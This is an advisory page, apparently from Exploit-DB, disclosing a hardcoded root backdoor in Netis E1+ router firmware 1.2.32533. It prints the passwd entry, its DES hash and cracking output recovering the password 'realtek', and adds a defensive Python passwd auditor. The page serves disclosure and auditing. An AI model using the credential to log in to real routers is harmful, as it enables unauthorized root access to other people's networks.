vendor: Netis E1+
by: Besim ALTINOK
CVSS: 7.5 (HIGH)
Backdoor Account
CWE: 798
Product Name: Netis E1+
Affected Version From: 1.2.32533
Affected Version To: 1.2.32533
Patch Exists: NO
CPE: o:netis:e1+:1.2.32533
Platforms Tested: Netis E1+ V1.2.32533
2020

Netis E1+ 1.2.32533 – Backdoor Account (root)

The Netis E1+ router, version 1.2.32533, contains a backdoor account that allows unauthorized access with root privileges. The account is defined by the passwd entry 'root:abSQTPcIskFGc:0:0:root:/:/bin/sh', whose second field is a traditional DES crypt(3) password hash; the John the Ripper output in the raw data below recovers the password 'realtek' from it. This vulnerability allows an attacker to gain full control over the router and potentially compromise the network.

Mitigation:

The vendor has not provided any official patch or mitigation for this vulnerability. It is recommended to discontinue the use of the affected router model or update to the latest firmware version if available.
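
For auditing an unpacked firmware image for this class of issue (CWE-798), the following is an added example, not part of the original advisory or any vendor tooling. It parses passwd-format lines and reports accounts that have a login shell and a password stored in the file itself, marking weak schemes such as the 13-character traditional DES crypt(3) form seen in the entry above. The function names and every sample line except the first are constructed for illustration.

```python
import re

# Password-field shapes, checked in order. Traditional DES crypt(3) is 13
# chars from [./0-9A-Za-z]; it uses only the first 8 password characters.
SCHEMES = [
    ("locked", re.compile(r"^[!*]")),      # login disabled
    ("shadowed", re.compile(r"^x$")),      # hash lives in /etc/shadow
    ("empty", re.compile(r"^$")),          # no password at all
    ("md5crypt", re.compile(r"^\$1\$")),
    ("sha256crypt", re.compile(r"^\$5\$")),
    ("sha512crypt", re.compile(r"^\$6\$")),
    ("descrypt", re.compile(r"^[./0-9A-Za-z]{13}$")),
]
WEAK = {"empty", "descrypt", "md5crypt"}
NOLOGIN = ("/nologin", "/false")


def classify(field):
    return next((n for n, p in SCHEMES if p.search(field)), "unknown")


def audit_passwd(text):
    """Return one finding per account that can log in with a baked-in password."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip().strip("*")  # advisories often wrap the entry in *...*
        parts = line.split(":")
        if line.startswith("#") or len(parts) != 7:
            continue
        user, pw, uid, _gid, _gecos, _home, shell = parts
        scheme = classify(pw)
        if scheme in ("locked", "shadowed") or shell.endswith(NOLOGIN):
            continue
        findings.append({"line": lineno, "user": user, "scheme": scheme,
                         "uid0": uid == "0", "weak": scheme in WEAK})
    return findings


# Constructed sample: line 1 is the entry from this page, the rest are made up.
SAMPLE = """\
root:abSQTPcIskFGc:0:0:root:/:/bin/sh
nobody:x:65534:65534:nobody:/var:/bin/false
admin:$6$constructedsalt$CONSTRUCTEDHASH:1000:1000:admin:/home/admin:/bin/sh
daemon:*:1:1:daemon:/usr/sbin:/bin/false
"""

if __name__ == "__main__":
    for finding in audit_passwd(SAMPLE):
        print(finding)
```

A finding with both `uid0` and `weak` set is the pattern this advisory describes; findings with a strong scheme still indicate a password fixed at build time and shared by every unit.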

Exploit-DB raw data:

# Exploit Title: Netis E1+ 1.2.32533 - Backdoor Account (root)
# Date: 2020-04-25
# Author: Besim ALTINOK
# Vendor Homepage: http://www.netis-systems.com
# Software Link: http://www.netis-systems.com/Suppory/downloads/dd/1/img/204
# Version: V1.2.32533
# Tested on: Netis E1+ V1.2.32533
# Credit: İsmail BOZKURT
-----------------------------

*root:abSQTPcIskFGc:0:0:root:/:/bin/sh*


Created directory: /home/pentestertraining/.john
Loaded 1 password hash (descrypt, traditional crypt(3) [DES 128/128 SSE2-16])
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: MaxLen = 13 is too large for the current hash type, reduced to 8
*realtek          (root)*
1g 0:00:00:28 3/3 0.03533g/s 1584Kp/s 1584Kc/s 1584KC/s realka2..reasll5
Use the "--show" option to display all of the cracked passwords reliably
Session completed